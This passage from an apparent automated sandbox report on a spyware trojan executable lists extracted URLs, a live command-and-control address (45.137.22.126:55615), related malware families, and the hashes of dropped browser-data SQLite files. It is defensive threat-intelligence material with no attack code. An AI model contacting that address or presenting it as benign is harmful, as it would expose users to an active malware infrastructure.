                                                                                  http://www.urwpp.deDPlease9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.zhongyicts.com.cn9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.sakkal.com9dOKGgFNL2.exe, 00000000.00000002.1742706998.0000000006474000.00000004.00000020.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://ipinfo.io/ip%appdata%9dOKGgFNL2.exe, 9dOKGgFNL2.exe, 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.apache.org/licenses/LICENSE-2.09dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.fontbureau.com9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://tempuri.org/Endpoint/CheckConnectResponse9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.datacontract.org/2004/07/9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://api.ip.sb/geoip%USERPEnvironmentROFILE%9dOKGgFNL2.exe, 9dOKGgFNL2.exe, 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://api.ip.sb9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Endpoint/CheckConnect9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.ecosia.org/newtab/tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drfalse
                                                                                                                  high
                                                                                                                  http://45.137.22.126:55615t-fq9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Endpoint/SetEnviron9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.carterandcone.coml9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://ac.ecosia.org/autocomplete?q=tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drfalse
                                                                                                                        high
                                                                                                                        http://www.fontbureau.com/designers/cabarga.htmlN9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.founder.com.cn/cn9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.fontbureau.com/designers/frere-user.html9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://tempuri.org/Endpoint/GetUpdatesResponse9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.jiyu-kobo.co.jp/9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.fontbureau.com/designers89dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/soap/actor/next9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://45.137.22.126:556159dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs
                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            45.137.22.126
                                                                                                                                            unknownNetherlands
                                                                                                                                            51447ROOTLAYERNETNLtrue
                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                            Analysis ID:1557008
                                                                                                                                            Start date and time:2024-11-17 03:06:05 +01:00
                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 6m 25s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:full
                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                            Number of analysed new started processes analysed:8
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Sample name:9dOKGgFNL2.exe
                                                                                                                                            renamed because original name is a hash value
                                                                                                                                            Original Sample Name:020ec1df3b8b9d28da16edaf0d50a262.exe
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@4/43@1/1
                                                                                                                                            EGA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            • Number of executed functions: 80
                                                                                                                                            • Number of non-executed functions: 9
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 104.26.13.31, 172.67.75.172, 104.26.12.31
                                                                                                                                            • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                            TimeTypeDescription
                                                                                                                                            21:06:58API Interceptor51x Sleep call for process: 9dOKGgFNL2.exe modified
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            45.137.22.126DEVIS + FACTURE.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                            • pharmaciedelaplage.bounceme.net/KLnDNWENP155.bin
                                                                                                                                            No context
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            ROOTLAYERNETNLRFQ List and airflight 2024.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                            • 45.137.22.174
                                                                                                                                            Calyciform.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                            • 45.137.22.248
                                                                                                                                            I5pvP0CU6M.exeGet hashmaliciousRedLineBrowse
                                                                                                                                            • 45.137.22.248
                                                                                                                                            gLsenXDHxP.exeGet hashmaliciousRedLineBrowse
                                                                                                                                            • 185.222.58.240
                                                                                                                                            DEVIS + FACTURE.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                            • 45.137.22.126
                                                                                                                                            PZNfhfaj9O.exeGet hashmaliciousRedLineBrowse
                                                                                                                                            • 185.222.58.80
                                                                                                                                            ZxS8mP8uE6.exeGet hashmaliciousRedLineBrowse
                                                                                                                                            • 45.137.22.123
                                                                                                                                            nu28HwzQwC.exeGet hashmaliciousRedLineBrowse
                                                                                                                                            • 185.222.58.52
                                                                                                                                            DKO6uy1Tia.exeGet hashmaliciousRedLineBrowse
                                                                                                                                            • 45.137.22.70
                                                                                                                                            3BOCQ22aUs.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                            • 45.137.20.45
                                                                                                                                            No context
                                                                                                                                            No context
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1216
                                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                            Malicious:true
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49152
                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49152
                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49152
                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49152
                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49152
                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49152
                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):114688
                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):114688
                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):114688
                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):114688
                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):114688
                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):114688
                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):114688
